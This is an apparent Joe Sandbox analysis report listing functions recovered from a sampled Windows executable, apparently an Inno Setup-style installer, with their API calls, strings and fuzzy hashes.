Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CursorDesktopWindow$Show
String ID:
API String ID: 2074268717-0
Opcode ID: bdf797e27c36325bb8c82eddb0fe25cd735ab4185a90c7389a74a707800caf49
Instruction ID: b367783c8e347dee620bf4ebb942fef05e7de29136c442ebf2d1f3a12f6593d4
Opcode Fuzzy Hash: bdf797e27c36325bb8c82eddb0fe25cd735ab4185a90c7389a74a707800caf49
Instruction Fuzzy Hash: 14415C75700250AFCB10EF39E984B9677E1AB64325F16807BE404CB365DA38ED91CF9A

Function 00408A5C Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A7D
LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AEC
LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B87
MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BC6

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: LoadString$FileMessageModuleName
String ID:
API String ID: 704749118-0
Opcode ID: e5f82f84354ef0ca283ae45606e551eda4c159cf8a0135734a08b6be587c5a6c
Instruction ID: 4dc4f8fa8e31f5a504acc487101d04bf7196a45c85b280592f63b9c2e46bb1d6
Opcode Fuzzy Hash: e5f82f84354ef0ca283ae45606e551eda4c159cf8a0135734a08b6be587c5a6c
Instruction Fuzzy Hash: 933154706083849EE330EB65C945BDB77E89B86304F40483FB6C8D72D1DB79A9088767

Function 0044E118 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E161

Part of subcall function 0044C7A4: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044C7D6

InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E1E5

Part of subcall function 0042BBC4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBD8

IsRectEmpty.USER32(?), ref: 0044E1A7
ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E1CA

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
String ID:
API String ID: 855768636-0
Opcode ID: 9a7a18137ec586f3ae39864321f244483684a0ffa01bccee3b65953e1ffa7791
Instruction ID: 2ff42263b9fd8d0bf3ebcb41181b8f96e25d68336b74147511caae446a0df0b7
Opcode Fuzzy Hash: 9a7a18137ec586f3ae39864321f244483684a0ffa01bccee3b65953e1ffa7791
Instruction Fuzzy Hash: A8114A72B4030127E310BA7E9C86B5B76899B88748F05483FB506EB383DEB9DC094399

Function 00493D84 Relevance: 6.1, APIs: 4, Instructions: 81COMMON

Download Yara Rule

APIs

OffsetRect.USER32(?,?,00000000), ref: 00493DE8
OffsetRect.USER32(?,00000000,?), ref: 00493E03
OffsetRect.USER32(?,?,00000000), ref: 00493E1D
OffsetRect.USER32(?,00000000,?), ref: 00493E38

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: OffsetRect
String ID:
API String ID: 177026234-0
Opcode ID: cfbccf1d698e82d79065cf95299db1547cf674505700e5d727bb5bb08f6f6c11
Instruction ID: 626cbd3239d4ed1d666785e4d5506dc5f63added092c4cfac4a9a75855a5826e
Opcode Fuzzy Hash: cfbccf1d698e82d79065cf95299db1547cf674505700e5d727bb5bb08f6f6c11
Instruction Fuzzy Hash: EF217AB6704201AFD700DE69CD85EABBBEEEBC4304F14CA2AF554C7249D634ED0487A6

Function 00417228 Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 00417270
SetCursor.USER32(00000000), ref: 004172B3
GetLastActivePopup.USER32(?), ref: 004172DD
GetForegroundWindow.USER32(?), ref: 004172E4

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Cursor$ActiveForegroundLastPopupWindow
String ID:
API String ID: 1959210111-0
Opcode ID: 8d64426bf1faa67f7e63d5b49e58984f19945b6ec6e4dfcc44bb455274275b92
Instruction ID: d42235d32f12bbd537443306c781531a61dc82822ae97907460fdfc4b9dfd860
Opcode Fuzzy Hash: 8d64426bf1faa67f7e63d5b49e58984f19945b6ec6e4dfcc44bb455274275b92
Instruction Fuzzy Hash: E02183313086018BCB20EB69D885AD773B1AB44758F4545ABF895CB352D73DDC82CB89

Function 00493A3C Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,00000008,?), ref: 00493A51
MulDiv.KERNEL32(?,00000008,?), ref: 00493A65
MulDiv.KERNEL32(?,00000008,?), ref: 00493A79
MulDiv.KERNEL32(?,00000008,?), ref: 00493A97

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
Instruction ID: 4fded1b76b16cf5233eb9f491647a43cf70802087f48ea21bc09c20ce05eabc8
Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
Instruction Fuzzy Hash: D011FE72604204ABCB40DEA9D8C4D9B7BECEF4D364B1541AAF918DB246D674ED408BA8

Function 0041F490 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(00400000,0041F480,?), ref: 0041F4B1
UnregisterClassA.USER32(0041F480,00400000), ref: 0041F4DA
RegisterClassA.USER32(00498598), ref: 0041F4E4
SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F51F

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow
String ID:
API String ID: 4025006896-0
Opcode ID: 533d640a4b08feb0459202762eb42d0053809421209bdbe4521837a12811d117
Instruction ID: 3ade520867520f28231aed23d56b060c1ae6e85fc3aaaf2b039856689379b016
Opcode Fuzzy Hash: 533d640a4b08feb0459202762eb42d0053809421209bdbe4521837a12811d117
Instruction Fuzzy Hash: 600152B12401047BCB10EF6DED81E9B37999769314B11413BBA05E72E1DA3A9C194BAD

Function 0040D210 Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D227
LoadResource.KERNEL32(00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B574,0000000A,REGDLL_EXE), ref: 0040D241
SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B574), ref: 0040D25B
LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?), ref: 0040D265

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
Instruction ID: 8b55825d53d46818f15098a3aa340eb6897fe62b828c159971ec5f2842f97e2f
Opcode Fuzzy Hash: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
Instruction Fuzzy Hash: ADF062736046046F8704EE9DA881D5B77ECDE88364310017FF908EB246DA38DD018B78

Function 00401548 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,Up,?,?,?,004018B4), ref: 00401566
VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,Up,?,?,?,004018B4), ref: 0040158B
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,Up,?,?,?,004018B4), ref: 004015B1

Strings

Up, xrefs: 0040154B

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Virtual$Alloc$Free
String ID: Up
API String ID: 3668210933-1945652401
Opcode ID: 4642c5e47627af4fb9a65464f5cf053fdc587df3507c7da2e3a58868ba6a62e8
Instruction ID: 5daa563b5b1fa11dd2f788f5c35568dff97f2482912b9d75d2b1da0796ca24bc
Opcode Fuzzy Hash: 4642c5e47627af4fb9a65464f5cf053fdc587df3507c7da2e3a58868ba6a62e8
Instruction Fuzzy Hash: DFF0C2B1640320AAEB315A294C85F133AD8DBC5794F1040B6BE09FF3DAD6B8980082AD

Function 0046EDD8 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000), ref: 0046EE29

Strings

Unsetting NTFS compression on directory: %s, xrefs: 0046EE0F
Failed to set NTFS compression state (%d)., xrefs: 0046EE3A
Setting NTFS compression on directory: %s, xrefs: 0046EDF7

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorLast
String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
API String ID: 1452528299-1392080489
Opcode ID: 69acb3433b7424efc8733916a2e3fd5d2b01e13f314b1d1949af057b0dba6a86
Instruction ID: 1e7f5b79b7b83b0710ae0b74761658cb8013dc9fe861025df3af78f0f88b0ad9
Opcode Fuzzy Hash: 69acb3433b7424efc8733916a2e3fd5d2b01e13f314b1d1949af057b0dba6a86
Instruction Fuzzy Hash: B1016734E0824856CF04D7EEA0412DDBBE49F09314F4485EFA855DB383EB7A0A0987AB

Function 004552B8 Relevance: 6.0, APIs: 4, Instructions: 41registrywindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045AECE,?,?,?,?,?,00000000,0045AEF5), ref: 004552F4
RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045AECE,?,?,?,?,?,00000000), ref: 004552FD
RemoveFontResourceA.GDI32(00000000), ref: 0045530A
SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0045531E

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
String ID:
API String ID: 4283692357-0
Opcode ID: 697a476951aa0a0ca9570e552bc061f69c865505889b6d894dbdf5d1e046680c
Instruction ID: 219cbfe3a978a329188234ed78272d854ba8405160bd4c7ea72be768510c46b8
Opcode Fuzzy Hash: 697a476951aa0a0ca9570e552bc061f69c865505889b6d894dbdf5d1e046680c
Instruction Fuzzy Hash: A3F05EB574070036EA10B6B69C87F2F268C9F98746F10483BBA04EF2C3D97CD804562D

Function 0046F584 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000), ref: 0046F5D5

Strings

Failed to set NTFS compression state (%d)., xrefs: 0046F5E6
Unsetting NTFS compression on file: %s, xrefs: 0046F5BB
Setting NTFS compression on file: %s, xrefs: 0046F5A3

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorLast
String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
API String ID: 1452528299-3038984924
Opcode ID: 2ae6e740da7d12cab45fc3fda2904aab771333dfed4c0176c99f618606694c86
Instruction ID: af1263a2bc2d08d5f84e5bf4467a93fc8ad6fd7f39d305876acfad47ab44e8ff
Opcode Fuzzy Hash: 2ae6e740da7d12cab45fc3fda2904aab771333dfed4c0176c99f618606694c86
Instruction Fuzzy Hash: 43016C30D0824865CF14DB9DA0412DDBBE49F09314F5485FFA895DB343EA790A0D8BAB

Function 0047B7B0 Relevance: 6.0, APIs: 4, Instructions: 35sleepCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0047B7D1
GetLastError.KERNEL32 ref: 0047B7DB
GetTickCount.KERNEL32 ref: 0047B7E5
Sleep.KERNEL32(00000032), ref: 0047B7F5

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorLast$CountSleepTick
String ID:
API String ID: 2227064392-0
Opcode ID: 0d6abcf2624c376c92be4fe051ac8c721ea0e8e4158ee005a25feb70aac8199d
Instruction ID: 04319ed9576db886230fb9bc867ee798ddcaac356600663dffa6fb38092a16ff
Opcode Fuzzy Hash: 0d6abcf2624c376c92be4fe051ac8c721ea0e8e4158ee005a25feb70aac8199d
Instruction Fuzzy Hash: 70E09B7230954149DA2935BF28C67BF5588CBC5764F145D3FF08DD6282C91C4C4796BE

Function 00476CAC Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A,00000000), ref: 00476CB5
OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A), ref: 00476CBB
GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7), ref: 00476CDD
CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7), ref: 00476CEE

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpen
String ID:
API String ID: 215268677-0
Opcode ID: 643da1b25484e25618dfc2f33770e0810dba7622c7134d6ef75615b708b11c8e
Instruction ID: 52cacee470f693cc175e787ed480d05e054b7fb82800b5b9fad0ca038f03fef1
Opcode Fuzzy Hash: 643da1b25484e25618dfc2f33770e0810dba7622c7134d6ef75615b708b11c8e
Instruction Fuzzy Hash: 04F01CA16447016ED600EAB5CD82A9B76DCEB44354F04883ABE98C72C1D678D808AA66

Function 00424250 Relevance: 6.0, APIs: 4, Instructions: 26windowCOMMON

Download Yara Rule

APIs

GetLastActivePopup.USER32(?), ref: 0042425C
IsWindowVisible.USER32(?), ref: 0042426D
IsWindowEnabled.USER32(?), ref: 00424277
SetForegroundWindow.USER32(?), ref: 00424281

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Window$ActiveEnabledForegroundLastPopupVisible
String ID:
API String ID: 2280970139-0
Opcode ID: 815aaf66aeb93fdb7eaca90ddf7e3ec79125ce151ba931028ab749093d5bac7c
Instruction ID: cc3e18b4355afb8de1117362fa5ee1cc3bb5bcb08e60588071b409dab7082488
Opcode Fuzzy Hash: 815aaf66aeb93fdb7eaca90ddf7e3ec79125ce151ba931028ab749093d5bac7c
Instruction Fuzzy Hash: DBE08691B02571929E71FA671881A9F018CCD45BE434602A7FD04F7243DB1CCC0041BC

Function 00406284 Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

GlobalHandle.KERNEL32 ref: 00406287
GlobalUnlock.KERNEL32(00000000), ref: 0040628E
GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
GlobalLock.KERNEL32(00000000), ref: 00406299

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Global$AllocHandleLockUnlock
String ID:
API String ID: 2167344118-0
Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D

Function 00469FE8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 259windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(00000000,00000000,0000F060,00000001), ref: 0046A1F3
EnableMenuItem.USER32(00000000,00000000,00000000), ref: 0046A1F9

Strings

CurPageChanged, xrefs: 0046A394

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Menu$EnableItemSystem
String ID: CurPageChanged
API String ID: 3692539535-2490978513
Opcode ID: ce3d69d9ba1a62642177f6d71e0f7aaa340e11e2d471205b7fc5bc675cd66b6b
Instruction ID: 7720c050ea6da0ef8e1be1b899a85f81ec2d70891b76be637dda81d079de5e74
Opcode Fuzzy Hash: ce3d69d9ba1a62642177f6d71e0f7aaa340e11e2d471205b7fc5bc675cd66b6b
Instruction Fuzzy Hash: 04B12834604604DFCB11DB59DA85EE973F5EF49308F2540F6E804AB362EB38AE51DB4A

Function 00478E14 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 210registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047A685,?,00000000,00000000,00000001,00000000,004790B1,?,00000000), ref: 00479075

Strings

Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00478EE9
Failed to parse "reg" constant, xrefs: 0047907C

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Close
String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
API String ID: 3535843008-1938159461
Opcode ID: 6cfa3a26321e55d12a01db98da27023ce14a7644c07822183f99b0fb8cfb2842
